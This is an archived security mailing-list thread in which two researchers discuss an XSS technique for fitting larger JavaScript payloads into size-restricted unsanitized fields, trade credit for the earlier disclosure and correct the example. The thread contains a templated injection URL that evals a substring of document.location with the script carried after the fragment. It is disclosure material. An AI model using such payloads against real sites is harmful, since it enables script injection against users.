Re: [Full-disclosure] [WEB SECURITY] Useful technique when performing XSS
pdp (architect) wrote: http://www.gnucitizen.org/blog/playing-in-large Basically this article is about how to squeeze more data into size restricted, unsanitized field. This technique can also be used to hide attackers activities. It seems that you've stumbled upon something I already disclosed: http://www.webappsec.org/lists/websecurity/archive/2005-10/msg00030.html Sorry... -Amit ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [WEB SECURITY] Useful technique when performing XSS
Amit, :) This is not about who did it first. BTW, your example is broken. location.search does not include the fragment identifier. Cheers On 2/7/07, Amit Klein [EMAIL PROTECTED] wrote: pdp (architect) wrote: http://www.gnucitizen.org/blog/playing-in-large Basically this article is about how to squeeze more data into size restricted, unsanitized field. This technique can also be used to hide attackers activities. It seems that you've stumbled upon something I already disclosed: http://www.webappsec.org/lists/websecurity/archive/2005-10/msg00030.html Sorry... -Amit -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [WEB SECURITY] Useful technique when performing XSS
pdp (architect) wrote: Amit, :) This is not about who did it first. Agreed. But it would be nice to receive the credit ;-) BTW, your example is broken. location.search does not include the fragment identifier. Guilty as charged. I remember working directly with document.location (which includes the hostname and path) when I investigated the issue, then when I wrote my text I decided that a more elegant way would be with the .search property, but I failed to verify that it actually works. Thanks for pointing this out, and here's the formal errata: In http://www.webappsec.org/lists/websecurity/archive/2005-10/msg00030.html, the example should be: http://target.site/vulnscript.cgi?injectme= http://target.site/vulnscript.cgi?injectme=scripteval(document.location.substr(...[fill in the offset here]...))/script#...JS payload here... Thanks to pdp (architect) for pointing this out. Regardns, -Amit Cheers On 2/7/07, Amit Klein [EMAIL PROTECTED] wrote: pdp (architect) wrote: http://www.gnucitizen.org/blog/playing-in-large Basically this article is about how to squeeze more data into size restricted, unsanitized field. This technique can also be used to hide attackers activities. It seems that you've stumbled upon something I already disclosed: http://www.webappsec.org/lists/websecurity/archive/2005-10/msg00030.html Sorry... -Amit ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [WEB SECURITY] Useful technique when performing XSS
pdp (architect) wrote: Hei Amit, On 2/7/07, Amit Klein [EMAIL PROTECTED] wrote: pdp (architect) wrote: Amit, :) This is not about who did it first. Agreed. But it would be nice to receive the credit ;-) Sorry man. I knew that you have discussed this before I would definitely give you the credits. :) No worries, mate! In http://www.webappsec.org/lists/websecurity/archive/2005-10/msg00030.html, the example should be: http://target.site/vulnscript.cgi?injectme= http://target.site/vulnscript.cgi?injectme=scripteval(document.location.substr(...[fill in the offset here]...))/script#...JS payload here... Of course, I meant document.location.href.substr(...), i.e.: http://target.site/vulnscript.cgi?injectme=scripteval(document.location.substr(...[fill in the offset here]...))/script#...JS payload here... -Amit ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [WEB SECURITY] Useful technique when performing XSS
Hei Amit, On 2/7/07, Amit Klein [EMAIL PROTECTED] wrote: pdp (architect) wrote: Amit, :) This is not about who did it first. Agreed. But it would be nice to receive the credit ;-) Sorry man. I knew that you have discussed this before I would definitely give you the credits. :) BTW, your example is broken. location.search does not include the fragment identifier. Guilty as charged. I remember working directly with document.location (which includes the hostname and path) when I investigated the issue, then when I wrote my text I decided that a more elegant way would be with the .search property, but I failed to verify that it actually works. Thanks for pointing this out, and here's the formal errata: In http://www.webappsec.org/lists/websecurity/archive/2005-10/msg00030.html, the example should be: http://target.site/vulnscript.cgi?injectme= http://target.site/vulnscript.cgi?injectme=scripteval(document.location.substr(...[fill in the offset here]...))/script#...JS payload here... Thanks to pdp (architect) for pointing this out. Regardns, -Amit Cheers On 2/7/07, Amit Klein [EMAIL PROTECTED] wrote: pdp (architect) wrote: http://www.gnucitizen.org/blog/playing-in-large Basically this article is about how to squeeze more data into size restricted, unsanitized field. This technique can also be used to hide attackers activities. It seems that you've stumbled upon something I already disclosed: http://www.webappsec.org/lists/websecurity/archive/2005-10/msg00030.html Sorry... -Amit -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
